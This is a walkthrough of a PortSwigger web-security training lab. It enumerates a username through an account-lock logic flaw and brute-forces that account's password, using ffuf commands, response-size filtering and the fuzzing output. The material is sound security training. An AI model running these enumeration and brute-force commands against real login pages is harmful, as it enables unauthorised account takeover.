This lab is vulnerable to username enumeration. It uses account locking, but this contains a logic flaw. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

-   [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
-   [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)

[Access the lab](https://portswigger.net/academy/labs/launch/4b100811651a2caccd08e1ee3d2a1c92a26c52cfc3d73f7ee773282373d39d3c?referrer=%2fweb-security%2fauthentication%2fpassword-based%2flab-username-enumeration-via-account-lock)

# Practical
Again, let's do some recon and see how the site actually works. So let's login first but the thing is we don't have any credentials so we have to enumerate for it. 
Let's enumerate it using ffuf since it's faster than Burp CE.

```bash
ffuf -w usernames.txt -u https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login -d 'username=FUZZ&password=peter' -c
```
And if we enumerate it the first and two times, we see that all the requests has the size, but when we enumerate it for the third time, one of them stands out so I filtered out the same size.

```bash
ffuf -w usernames.txt -u https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login -d 'username=FUZZ&password=peter' -c -fs 2994
```
And we found this :
```bash
access                  [Status: 200, Size: 3046, Words: 1155, Lines: 63]
```
And we if we try to login in with this account with a random password, we get a :
```
Invalid password after many attempts, please try again 1 minute later
```
So this account must exist since it's locking it.
Now we have to brute-force the password but the thing is that we have a cool down of 3 times for 1 minute so we have to do this wisely.
Fuzzing the password for 3 times, we see some weird responses.
We see one with size of 2994 and 2916 while others are 3046. Let's filter 3046 and only grab the weird ones.
```bash
[Status: 200, Size: 2994, Words: 1145, Lines: 63]
| URL | https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login
    * FUZZ: master
[Status: 200, Size: 2994, Words: 1145, Lines: 63]
| URL | https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login
    * FUZZ: 654321

[Status: 200, Size: 2994, Words: 1145, Lines: 63]
| URL | https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login
    * FUZZ: 000000

[Status: 200, Size: 2916, Words: 1117, Lines: 62]
| URL | https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login
    * FUZZ: andrew
```
Now we'll make our custom word list for this and try it 1 minute later.
```txt
master
654321
000000
andrew
```
And let's fuzz again with these candidates.
```bash
ffuf -w possible.txt -u https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login -d 'username=access&password=FUZZ' -c -v
```
And we got a 302 response for andrew!
```bash
[Status: 302, Size: 0, Words: 1, Lines: 1]
| URL | https://target-acc41f801ff68901806c404300f40076.web-security-academy.net/login
| --> | /my-account
    * FUZZ: andrew
```
And since it's redirecting us to /my-account it has to be his account.
So let's login with these credentials.
```txt
access.andrew
```
And we logged in and solved the lab!